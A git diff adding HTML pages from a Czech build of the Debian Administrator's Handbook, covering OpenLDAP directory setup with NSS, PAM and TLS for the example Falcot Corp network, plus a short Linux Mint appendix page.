+						DNS domain name: “<code
+                    class="literal">falcot.com</code>”.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						Organization name: “Falcot Corp”.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						An administrative passwords needs to be typed in.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						Database backend to use: “MDB”.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						Do you want the database to be removed when <span
+                    class="pkg pkg">slapd</span> is purged? No. No point in risking losing the database in case of a mistake.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						Move old database? This question is only asked when the configuration is attempted while a database already exists. Only answer “yes” if you actually want to start again from a clean database, for instance if you run <code
+                    class="command">dpkg-reconfigure slapd</code> right after the initial installation.
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						Allow LDAPv2 protocol? No, there is no point in that. All the tools we are going to use understand the LDAPv3 protocol.
+					</div></li></ul></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>BACK TO BASICS</em></span> LDIF format</strong></p></div></div></div><div
+              class="para">
+				An LDIF file (<span
+                class="emphasis"><em>LDAP Data Interchange Format</em></span>) is a portable text file describing the contents of an LDAP database (or a portion thereof); this can then be used to inject the data into any other LDAP server.
+			</div><a
+              id="id-1.14.10.7.6.3"
+              class="indexterm"></a></div><div
+            class="para">
+				A minimal database is now configured, as demonstrated by the following query:
+			</div><pre
+            class="screen">
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>ldapsearch -x -b dc=falcot,dc=com</code></strong>
+<code
+              class="computeroutput"># extended LDIF
+#
+# LDAPv3
+# base &lt;dc=falcot,dc=com&gt; with scope sub
+# filter: (objectclass=*)
+# requesting: ALL
+#
+
+# falcot.com
+dn: dc=falcot,dc=com
+objectClass: top
+objectClass: dcObject
+objectClass: organization
+o: Falcot Corp
+dc: falcot
+
+# admin, falcot.com
+dn: cn=admin,dc=falcot,dc=com
+objectClass: simpleSecurityObject
+objectClass: organizationalRole
+cn: admin
+description: LDAP administrator
+
+# search result
+search: 2
+result: 0 Success
+
+# numResponses: 3
+# numEntries: 2
+</code></pre><div
+            class="para">
+				The query returned two objects: the organization itself, and the administrative user.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.14.10.8"></a>11.7.2. Filling in the Directory</h3></div></div></div><div
+            class="para">
+				Since an empty database is not particularly useful, we are going to inject into it all the existing directories; this includes the users, groups, services and hosts databases.
+			</div><div
+            class="para">
+				The <span
+              class="pkg pkg">migrationtools</span> package provides a set of scripts dedicated to extract data from the standard Unix directories (<code
+              class="filename">/etc/passwd</code>, <code
+              class="filename">/etc/group</code>, <code
+              class="filename">/etc/services</code>, <code
+              class="filename">/etc/hosts</code> and so on), convert this data, and inject it into the LDAP database.
+			</div><a
+            id="id-1.14.10.8.4"
+            class="indexterm"></a><div
+            class="para">
+				Once the package is installed, the <code
+              class="filename">/etc/migrationtools/migrate_common.ph</code> must be edited; the <code
+              class="varname">IGNORE_UID_BELOW</code> and <code
+              class="varname">IGNORE_GID_BELOW</code> options need to be enabled (uncommenting them is enough), and <code
+              class="varname">DEFAULT_MAIL_DOMAIN</code>/<code
+              class="varname">DEFAULT_BASE</code> need to be updated.
+			</div><div
+            class="para">
+				The actual migration operation is handled by the <code
+              class="command">migrate_all_online.sh</code> command, as follows:
+			</div><pre
+            class="screen">
+<code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>cd /usr/share/migrationtools</code></strong>
+<code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>LDAPADD="/usr/bin/ldapadd -c" ETC_ALIASES=/dev/null ./migrate_all_online.sh</code></strong></pre><div
+            class="para">
+				The <code
+              class="command">migrate_all_online.sh</code> asks a few questions about the LDAP database into which the data is to be migrated. <a
+              class="xref"
+              href="sect.ldap-directory.html#tab-migrate-all">11.1</a> summarizes the answers given in the Falcot use-case.
+			</div><div
+            class="table"><a
+              xmlns=""
+              id="tab-migrate-all"></a><p
+              class="title"><strong>Tabulka 11.1. Answers to questions asked by the <code
+                  class="command">migrate_all_online.sh</code> script</strong></p><div
+              class="table-contents"><table
+                xmlns:d="http://docbook.org/ns/docbook"
+                class="lt-4-cols lt-7-rows"
+                summary="Answers to questions asked by the migrate_all_online.sh script"><colgroup><col
+                    align="justify" /><col
+                    align="justify" /></colgroup><thead><tr><th
+                      align="justify">Question</th><th
+                      align="justify">Answer</th></tr></thead><tbody><tr><td
+                      align="justify">X.500 naming context</td><td
+                      align="justify"><code
+                        class="literal">dc=falcot,dc=com</code></td></tr><tr><td
+                      align="justify">LDAP server hostname</td><td
+                      align="justify"><code
+                        class="literal">localhost</code></td></tr><tr><td
+                      align="justify">Manager DN</td><td
+                      align="justify"><code
+                        class="literal">cn=admin,dc=falcot,dc=com</code></td></tr><tr><td
+                      align="justify">Bind credentials</td><td
+                      align="justify">the administrative password</td></tr><tr><td
+                      align="justify">Create DUAConfigProfile</td><td
+                      align="justify">no</td></tr></tbody></table></div></div><div
+            class="para">
+				We deliberately ignore migration of the <code
+              class="filename">/etc/aliases</code> file, since the standard schema as provided by Debian does not include the structures that this script uses to describe email aliases. Should we want to integrate this data into the directory, the <code
+              class="filename">/etc/ldap/schema/misc.schema</code> file should be added to the standard schema.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TOOL</em></span> Browsing an LDAP directory</strong></p></div></div></div><div
+              class="para">
+				The <code
+                class="command">jxplorer</code> command (in the package of the same name) is a graphical tool allowing to browse and edit an LDAP database. It is an interesting tool that provides an administrator with a good overview of the hierarchical structure of the LDAP data.
+			</div><a
+              id="id-1.14.10.8.11.3"
+              class="indexterm"></a></div><div
+            class="para">
+				Also note the use of the <code
+              class="literal">-c</code> option to the <code
+              class="command">ldapadd</code> command; this option requests that processing doesn't stop in case of error. Using this option is required because converting the <code
+              class="filename">/etc/services</code> often generates a few errors that can safely be ignored.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.14.10.9"></a>11.7.3. Managing Accounts with LDAP</h3></div></div></div><div
+            class="para">
+				Now the LDAP database contains some useful information, the time has come to make use of this data. This section focuses on how to configure a Linux system so that the various system directories use the LDAP database.
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.config-nss"></a>11.7.3.1. Configuring NSS</h4></div></div></div><div
+              class="para">
+					The NSS system (Name Service Switch, see sidebar <a
+                class="xref"
+                href="sect.user-group-databases.html#sidebar.intro-nss"><span
+                  class="emphasis"><em>GOING FURTHER</em></span> NSS and system databases</a>) is a modular system designed to define or fetch information for system directories. Using LDAP as a source of data for NSS requires installing the <span
+                class="pkg pkg">libnss-ldap</span> package. Its installation asks a few questions; the answers are summarized in <a
+                class="xref"
+                href="sect.ldap-directory.html#tab-libnss-ldap">11.2</a>.
+				</div><a
+              id="id-1.14.10.9.3.3"
+              class="indexterm"></a><div
+              class="table"><a
+                xmlns=""
+                id="tab-libnss-ldap"></a><p
+                class="title"><strong>Tabulka 11.2. Configuring the <span
+                    class="pkg pkg">libnss-ldap</span> package</strong></p><div
+                class="table-contents"><table
+                  xmlns:d="http://docbook.org/ns/docbook"
+                  class="lt-4-cols gt-7-rows"
+                  summary="Configuring the libnss-ldap package"><colgroup><col
+                      align="justify" /><col
+                      align="justify" /></colgroup><thead><tr><th
+                        align="justify">Question</th><th
+                        align="justify">Answer</th></tr></thead><tbody><tr><td
+                        align="justify">LDAP server Uniform Resource Identifier</td><td
+                        align="justify"> <code
+                          class="literal">ldap://ldap.falcot.com</code> </td></tr><tr><td
+                        align="justify">Distinguished name of the search base</td><td
+                        align="justify"> <code
+                          class="literal">dc=falcot,dc=com</code> </td></tr><tr><td
+                        align="justify">LDAP version to use</td><td
+                        align="justify"> <code
+                          class="literal">3</code> </td></tr><tr><td
+                        align="justify">Does the LDAP database require login?</td><td
+                        align="justify">no</td></tr><tr><td
+                        align="justify">Special LDAP privileges for root</td><td
+                        align="justify">yes</td></tr><tr><td
+                        align="justify">Make the configuration file readable/writeable by its owner only</td><td
+                        align="justify">no</td></tr><tr><td
+                        align="justify">LDAP account for root</td><td
+                        align="justify"> <code
+                          class="literal">cn=admin,dc=falcot,dc=com</code> </td></tr><tr><td
+                        align="justify">LDAP root account password</td><td
+                        align="justify">the administrative password</td></tr></tbody></table></div></div><div
+              class="para">
+					The <code
+                class="filename">/etc/nsswitch.conf</code> file then needs to be modified, so as to configure NSS to use the freshly-installed <code
+                class="command">ldap</code> module.
+				</div><div
+              class="example"><a
+                xmlns=""
+                id="id-1.14.10.9.3.6"></a><p
+                class="title"><strong>Příklad 11.26. The <code
+                    class="filename">/etc/nsswitch.conf</code> file</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">
+# /etc/nsswitch.conf
+#
+# Example configuration of GNU Name Service Switch functionality.
+# If you have the `glibc-doc' and `info' packages installed, try:
+# `info libc "Name Service Switch"' for information about this file.
+
+passwd: ldap compat
+group: ldap compat
+shadow: ldap compat
+
+hosts: files dns ldap
+networks: ldap files
+
+protocols: ldap db files
+services: ldap db files
+ethers: ldap db files
+rpc: ldap db files
+
+netgroup: ldap files
+</pre></div></div><div
+              class="para">
+					The <code
+                class="command">ldap</code> module is usually inserted before others, and it will therefore be queried first. The notable exception is the <code
+                class="literal">hosts</code> service since contacting the LDAP server requires consulting DNS first (to resolve <code
+                class="literal">ldap.falcot.com</code>). Without this exception, a hostname query would try to ask the LDAP server; this would trigger a name resolution for the LDAP server, and so on in an infinite loop.
+				</div><div
+              class="para">
+					If the LDAP server should be considered authoritative (and the local files used by the <code
+                class="command">files</code> module disregarded), services can be configured with the following syntax:
+				</div><div
+              class="para">
+					<code
+                class="literal"><em
+                  class="replaceable">service</em>: ldap [NOTFOUND=return] files</code>.
+				</div><div
+              class="para">
+					If the requested entry does not exist in the LDAP database, the query will return a “not existing” reply even if the resource does exist in one of the local files; these local files will only be used when the LDAP service is down.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.config-pam"></a>11.7.3.2. Configuring PAM</h4></div></div></div><div
+              class="para">
+					This section describes a PAM configuration (see sidebar <a
+                class="xref"
+                href="basic-configuration.html#sidebar.intro-pam"><span
+                  class="emphasis"><em>BEHIND THE SCENES</em></span> <code
+                  class="filename">/etc/environment</code> and <code
+                  class="filename">/etc/default/locale</code></a>) that will allow applications to perform the required authentications against the LDAP database.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>CAUTION</em></span> Broken authentication</strong></p></div></div></div><div
+                class="para">
+					Changing the standard PAM configuration used by various programs is a sensitive operation. A mistake can lead to broken authentication, which could prevent logging in. Keeping a root shell open is therefore a good precaution. If configuration errors occur, they can be then fixed and the services restarted with minimal effort.
+				</div></div><div
+              class="para">
+					The LDAP module for PAM is provided by the <span
+                class="pkg pkg">libpam-ldap</span> package. Installing this package asks a few questions very similar to those in <span
+                class="pkg pkg">libnss-ldap</span>; some configuration parameters (such as the URI for the LDAP server) are even actually shared with the <span
+                class="pkg pkg">libnss-ldap</span> package. Answers are summarized in <a
+                class="xref"
+                href="sect.ldap-directory.html#tab-libpam-ldap">11.3</a>.
+				</div><a
+              id="id-1.14.10.9.4.5"
+              class="indexterm"></a><div
+              class="table"><a
+                xmlns=""
+                id="tab-libpam-ldap"></a><p
+                class="title"><strong>Tabulka 11.3. Configuration of <span
+                    class="emphasis"><em>libpam-ldap</em></span></strong></p><div
+                class="table-contents"><table
+                  xmlns:d="http://docbook.org/ns/docbook"
+                  class="lt-4-cols lt-7-rows"
+                  summary="Configuration of libpam-ldap"><colgroup><col
+                      align="justify" /><col
+                      align="justify" /></colgroup><thead><tr><th
+                        align="justify">Question</th><th
+                        align="justify">Answer</th></tr></thead><tbody><tr><td
+                        align="justify">Allow LDAP admin account to behave like local root?</td><td
+                        align="justify">Yes. This allows using the usual <code
+                          class="command">passwd</code> command for changing passwords stored in the LDAP database.</td></tr><tr><td
+                        align="justify">Does the LDAP database require logging in?</td><td
+                        align="justify">no</td></tr><tr><td
+                        align="justify">LDAP account for root</td><td
+                        align="justify"> <code
+                          class="literal">cn=admin,dc=falcot,dc=com</code> </td></tr><tr><td
+                        align="justify">LDAP root account password</td><td
+                        align="justify">the LDAP database administrative password</td></tr><tr><td
+                        align="justify">Local encryption algorithm to use for passwords</td><td
+                        align="justify">crypt</td></tr></tbody></table></div></div><div
+              class="para">
+					Installing <span
+                class="pkg pkg">libpam-ldap</span> automatically adapts the default PAM configuration defined in the <code
+                class="filename">/etc/pam.d/common-auth</code>, <code
+                class="filename">/etc/pam.d/common-password</code> and <code
+                class="filename">/etc/pam.d/common-account</code> files. This mechanism uses the dedicated <code
+                class="command">pam-auth-update</code> tool (provided by the <span
+                class="pkg pkg">libpam-runtime</span> package). This tool can also be run by the administrator should they wish to enable or disable PAM modules.
+				</div><a
+              id="id-1.14.10.9.4.8"
+              class="indexterm"></a><a
+              id="id-1.14.10.9.4.9"
+              class="indexterm"></a><a
+              id="id-1.14.10.9.4.10"
+              class="indexterm"></a><a
+              id="id-1.14.10.9.4.11"
+              class="indexterm"></a><a
+              id="id-1.14.10.9.4.12"
+              class="indexterm"></a><a
+              id="id-1.14.10.9.4.13"
+              class="indexterm"></a></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.14.10.9.5"></a>11.7.3.3. Securing LDAP Data Exchanges</h4></div></div></div><a
+              id="id-1.14.10.9.5.2"
+              class="indexterm"></a><div
+              class="para">
+					By default, the LDAP protocol transits on the network as cleartext; this includes the (encrypted) passwords. Since the encrypted passwords can be extracted from the network, they can be vulnerable to dictionary-type attacks. This can be avoided by using an extra encryption layer; enabling this layer is the topic of this section.
+				</div><div
+              class="section"><div
+                class="titlepage"><div><div><h5
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.14.10.9.5.4"></a>11.7.3.3.1. Configuring the Server</h5></div></div></div><a
+                id="id-1.14.10.9.5.4.2"
+                class="indexterm"></a><a
+                id="id-1.14.10.9.5.4.3"
+                class="indexterm"></a><div
+                class="para">
+						The first step is to create a key pair (comprising a public key and a private key) for the LDAP server. The Falcot administrators reuse <span
+                  class="emphasis"><em>easy-rsa</em></span> to generate it (see <a
+                  class="xref"
+                  href="sect.virtual-private-network.html#sect.easy-rsa">10.2.1.1 – „Public Key Infrastructure: <span
+                    class="emphasis"><em>easy-rsa</em></span>“</a>). Running <code
+                  class="command">./build-key-server ldap.falcot.com</code> asks a few mundane questions (location, organization name and so on). The answer to the “common name” question <span
+                  class="emphasis"><em>must</em></span> be the fully-qualified hostname for the LDAP server; in our case, <code
+                  class="literal">ldap.falcot.com</code>.
+					</div><div
+                class="para">
+						This command creates a certificate in the <code
+                  class="filename">keys/ldap.falcot.com.crt</code> file; the corresponding private key is stored in <code
+                  class="filename">keys/ldap.falcot.com.key</code>.
+					</div><div
+                class="para">
+						Now these keys have to be installed in their standard location, and we must make sure that the private file is readable by the LDAP server which runs under the <code
+                  class="literal">openldap</code> user identity:
+					</div><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>adduser openldap ssl-cert
+</code></strong><code
+                  class="computeroutput">Adding user `openldap' to group `ssl-cert' ...
+Adding user openldap to group ssl-cert
+Done.
+# </code><strong
+                  class="userinput"><code>mv keys/ldap.falcot.com.key /etc/ssl/private/ldap.falcot.com.key
+</code></strong><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>chown root:ssl-cert /etc/ssl/private/ldap.falcot.com.key
+</code></strong><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>chmod 0640 /etc/ssl/private/ldap.falcot.com.key
+</code></strong><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>mv newcert.pem /etc/ssl/certs/ldap.falcot.com.pem
+</code></strong></pre><div
+                class="para">
+						The <code
+                  class="command">slapd</code> daemon also needs to be told to use these keys for encryption. The LDAP server configuration is managed dynamically: the configuration can be updated with normal LDAP operations on the <code
+                  class="literal">cn=config</code> object hierarchy, and the server updates <code
+                  class="filename">/etc/ldap/slapd.d</code> in real time to make the configuration persistent. <code
+                  class="command">ldapmodify</code> is thus the right tool to update the configuration:
+					</div><div
+                class="example"><a
+                  xmlns=""
+                  id="id-1.14.10.9.5.4.9"></a><p
+                  class="title"><strong>Příklad 11.27. Configuring <code
+                      class="command">slapd</code> for encryption</strong></p><div
+                  class="example-contents"><pre
+                    class="screen"><code
+                      class="computeroutput"># </code><strong
+                      class="userinput"><code>cat &gt;ssl.ldif &lt;&lt;END
+dn: cn=config
+changetype: modify
+add: olcTLSCertificateFile
+olcTLSCertificateFile: /etc/ssl/certs/ldap.falcot.com.pem
+-
+add: olcTLSCertificateKeyFile
+olcTLSCertificateKeyFile: /etc/ssl/private/ldap.falcot.com.key
+-
+END
+</code></strong><code
+                      class="computeroutput"># </code><strong
+                      class="userinput"><code>ldapmodify -Y EXTERNAL -H ldapi:/// -f ssl.ldif
+</code></strong><code
+                      class="computeroutput">SASL/EXTERNAL authentication started
+SASL username: gidNumber=0+uidNumber=0,cn=peercred,cn=external,cn=auth
+SASL SSF: 0
+modifying entry "cn=config"
+</code></pre></div></div><div
+                class="sidebar"><div
+                  class="titlepage"><div><div><p
+                        class="title"><strong><span
+                            class="emphasis"><em>TOOL</em></span> <code
+                            class="command">ldapvi</code> to edit an LDAP directory</strong></p></div></div></div><a
+                  id="id-1.14.10.9.5.4.10.2"
+                  class="indexterm"></a><div
+                  class="para">
+						With <code
+                    class="command">ldapvi</code>, you can display an LDIF output of any part of the LDAP directory, make some changes in the text editor, and let the tool do the corresponding LDAP operations for you.
+					</div><div
+                  class="para">
+						It is thus a convenient way to update the configuration of the LDAP server, simply by editing the <code
+                    class="literal">cn=config</code> hierarchy.
+					</div><pre
+                  class="screen"><code
+                    class="computeroutput"># </code><strong
+                    class="userinput"><code>ldapvi -Y EXTERNAL -h ldapi:/// -b cn=config
+</code></strong></pre></div><div
+                class="para">
+						The last step for enabling encryption involves changing the <code
+                  class="varname">SLAPD_SERVICES</code> variable in the <code
+                  class="filename">/etc/default/slapd</code> file. We'll play it safe and disable unsecured LDAP altogether.
+					</div><div
+                class="example"><a
+                  xmlns=""
+                  id="id-1.14.10.9.5.4.12"></a><p
+                  class="title"><strong>Příklad 11.28. The <code
+                      class="filename">/etc/default/slapd</code> file</strong></p><div
+                  class="example-contents"><pre
+                    class="programlisting">
+# Default location of the slapd.conf file or slapd.d cn=config directory. If
+# empty, use the compiled-in default (/etc/ldap/slapd.d with a fallback to
+# /etc/ldap/slapd.conf).
+SLAPD_CONF=
+
+# System account to run the slapd server under. If empty the server
+# will run as root.
+SLAPD_USER="openldap"
+
+# System group to run the slapd server under. If empty the server will
+# run in the primary group of its user.
+SLAPD_GROUP="openldap"
+
+# Path to the pid file of the slapd server. If not set the init.d script
+# will try to figure it out from $SLAPD_CONF (/etc/ldap/slapd.conf by
+# default)
+SLAPD_PIDFILE=
+
+# slapd normally serves ldap only on all TCP-ports 389. slapd can also
+# service requests on TCP-port 636 (ldaps) and requests via unix
+# sockets.
+# Example usage:
+# SLAPD_SERVICES="ldap://127.0.0.1:389/ ldaps:/// ldapi:///"
+SLAPD_SERVICES="ldaps:/// ldapi:///"
+
+# If SLAPD_NO_START is set, the init script will not start or restart
+# slapd (but stop will still work).  Uncomment this if you are
+# starting slapd via some other means or if you don't want slapd normally
+# started at boot.
+#SLAPD_NO_START=1
+
+# If SLAPD_SENTINEL_FILE is set to path to a file and that file exists,
+# the init script will not start or restart slapd (but stop will still
+# work).  Use this for temporarily disabling startup of slapd (when doing
+# maintenance, for example, or through a configuration management system)
+# when you don't want to edit a configuration file.
+SLAPD_SENTINEL_FILE=/etc/ldap/noslapd
+
+# For Kerberos authentication (via SASL), slapd by default uses the system
+# keytab file (/etc/krb5.keytab).  To use a different keytab file,
+# uncomment this line and change the path.
+#export KRB5_KTNAME=/etc/krb5.keytab
+
+# Additional options to pass to slapd
+SLAPD_OPTIONS=""
+</pre></div></div></div><div
+              class="section"><div
+                class="titlepage"><div><div><h5
+                      class="title"><a
+                        xmlns=""
+                        id="id-1.14.10.9.5.5"></a>11.7.3.3.2. Configuring the Client</h5></div></div></div><div
+                class="para">
+						On the client side, the configuration for the <span
+                  class="emphasis"><em>libpam-ldap</em></span> and <span
+                  class="emphasis"><em>libnss-ldap</em></span> modules needs to be modified to use an <code
+                  class="literal">ldaps://</code> URI.
+					</div><div
+                class="para">
+						LDAP clients also need to be able to authenticate the server. In a X.509 public key infrastructure, public certificates are signed by the key of a certificate authority (CA). With <span
+                  class="emphasis"><em>easy-rsa</em></span>, the Falcot administrators have created their own CA and they now need to configure the system to trust the signatures of Falcot's CA. This can be done by putting the CA certificate in <code
+                  class="filename">/usr/local/share/ca-certificates</code> and running <code
+                  class="command">update-ca-certificates</code>.
+					</div><pre
+                class="screen"><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>cp keys/ca.crt /usr/local/share/ca-certificates/falcot.crt
+</code></strong><code
+                  class="computeroutput"># </code><strong
+                  class="userinput"><code>update-ca-certificates
+</code></strong><code
+                  class="computeroutput">Updating certificates in /etc/ssl/certs... 1 added, 0 removed; done.
+Running hooks in /etc/ca-certificates/update.d....
+Adding debian:falcot.pem
+done.
+done.
+</code></pre><div
+                class="para">
+						Last but not least, the default LDAP URI and default base DN used by the various command line tools can be modified in <code
+                  class="filename">/etc/ldap/ldap.conf</code>. This will save quite some typing.
+					</div><div
+                class="example"><a
+                  xmlns=""
+                  id="id-1.14.10.9.5.5.6"></a><p
+                  class="title"><strong>Příklad 11.29. The <code
+                      class="filename">/etc/ldap/ldap.conf</code> file</strong></p><div
+                  class="example-contents"><pre
+                    class="programlisting">#
+# LDAP Defaults
+#
+
+# See ldap.conf(5) for details
+# This file should be world readable but not world writable.
+
+BASE   dc=falcot,dc=com
+URI    ldaps://ldap.falcot.com
+
+#SIZELIMIT      12
+#TIMELIMIT      15
+#DEREF          never
+
+# TLS certificates (needed for GnuTLS)
+TLS_CACERT      /etc/ssl/certs/ca-certificates.crt
+</pre></div></div></div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.http-ftp-proxy.html"><strong>Předcházející</strong>11.6. HTTP/FTP Proxy</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.rtc-services.html"><strong>Další</strong>11.8. Real-Time Communication Services</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.linux-mint.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.linux-mint.html
new file mode 100644
index 000000000..e8ef792cf
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.linux-mint.html
@@ -0,0 +1,93 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">A.3. Linux Mint</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Live CD, Specificities, Particular Choices" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="derivative-distributions.html"
+        title="Příloha A. Derivative Distributions" /><link
+        rel="prev"
+        href="sect.ubuntu.html"
+        title="A.2. Ubuntu" /><link
+        rel="next"
+        href="sect.knoppix.html"
+        title="A.4. Knoppix" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.linux-mint.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.ubuntu.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.knoppix.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.linux-mint"></a>A.3. Linux Mint</h2></div></div></div><a
+          id="id-1.20.6.2"
+          class="indexterm"></a><div
+          class="para">
+			Linux Mint is a (partly) community-maintained distribution, supported by donations and advertisements. Their flagship product is based on Ubuntu, but they also provide a “Linux Mint Debian Edition” variant that evolves continuously (as it is based on Debian Testing). In both cases, the initial installation involves booting a LiveDVD.
+		</div><div
+          class="para">
+			The distribution aims at simplifying access to advanced technologies, and provides specific graphical user interfaces on top of the usual software. For instance, Linux Mint relies on Cinnamon instead of GNOME by default (but it also includes MATE as well as Plasma and Xfce); similarly, the package management interface, although based on APT, provides a specific interface with an evaluation of the risk from each package update.
+		</div><div
+          class="para">
+			Linux Mint includes a large amount of proprietary software to improve the experience of users who might need those. For example: Adobe Flash and multimedia codecs. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="http://www.linuxmint.com/">http://www.linuxmint.com/</a></div>
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.ubuntu.html"><strong>Předcházející</strong>A.2. Ubuntu</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.knoppix.html"><strong>Další</strong>A.4. Knoppix</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.main-desktop-tools.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.main-desktop-tools.html
new file mode 100644
index 000000000..f07ffa6b2
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.main-desktop-tools.html
@@ -0,0 +1,185 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">13.4. Email</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Workstation, Graphical desktop, Office work, X.org" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="workstation.html"
+        title="Kapitola 13. Workstation" /><link
+        rel="prev"
+        href="sect.graphical-desktops.html"
+        title="13.3. Graphical Desktops" /><link
+        rel="next"
+        href="sect.web-browsers.html"
+        title="13.5. Web Browsers" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.main-desktop-tools.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.graphical-desktops.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.web-browsers.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.main-desktop-tools"></a>13.4. Email</h2></div></div></div><a
+          id="id-1.16.7.2"
+          class="indexterm"></a><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.16.7.3"></a>13.4.1. Evolution</h3></div></div></div><a
